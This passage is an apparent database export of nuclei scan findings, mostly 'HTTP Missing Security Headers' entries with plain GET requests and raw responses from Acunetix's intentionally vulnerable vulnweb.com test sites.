29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9100')" style="color:Black" title="November 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9101')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9102')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9103')" style="color:Black" title="December 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9104')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9105')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9106')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9107')" style="color:Black" title="December 07">7</a></td></tr>\r\n</table><BR>\r\n<a href="rssFeed.aspx">Get RSS feed</a>\r\n</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD colSpan="2">\r\n\t\t\t\t\t</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t</TABLE>\r\n\t\t</form>\r\n\t</body>\r\n\t<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">\r\n\t\t<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>\r\n\t</div>\r\n</HTML>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 398, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/T", + "discovered_date": "2024-11-13T02:41:00.523Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /T HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nContent-Length: 1233\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:46 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>403 - Forbidden: Access is denied.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>403 - Forbidden: Access is denied.</h2>\r\n <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 399, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/comment", + "discovered_date": "2024-11-13T02:41:00.651Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /comment HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Sorry, but commenting is currently disabled! <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 400, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:41:00.780Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 308 PERMANENT REDIRECT\r\nConnection: close\r\nContent-Length: 253\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nLocation: http://localhost/admin/\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>Redirecting...</title>\n<h1>Redirecting...</h1>\n<p>You should be redirected automatically to target URL: <a href="http://localhost/admin/">http://localhost/admin/</a>. If not click the link.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 401, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202", + "discovered_date": "2024-11-13T02:41:00.907Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:202 HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 402, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/.carousel", + "discovered_date": "2024-11-13T02:41:01.051Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.carousel HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 NOT FOUND\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>404 Not Found</title>\n<h1>Not Found</h1>\n<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 403, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Repository", + "discovered_date": "2024-11-13T02:41:01.190Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Repository HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 8\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:56 GMT\r\nEtag: "4dca64a4-8"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\nacupart\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 404, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/login", + "discovered_date": "2024-11-13T02:41:01.323Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 405, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/contact", + "discovered_date": "2024-11-13T02:41:01.457Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /contact HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 406, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/ajax/archive", + "discovered_date": "2024-11-13T02:41:01.596Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /ajax/archive HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 2\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n[]", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 407, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/forgotpw", + "discovered_date": "2024-11-13T02:41:01.736Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /forgotpw HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 408, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries.Log", + "discovered_date": "2024-11-13T02:41:01.871Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries.Log HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 409, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at", + "discovered_date": "2024-11-13T02:41:02.017Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:105at 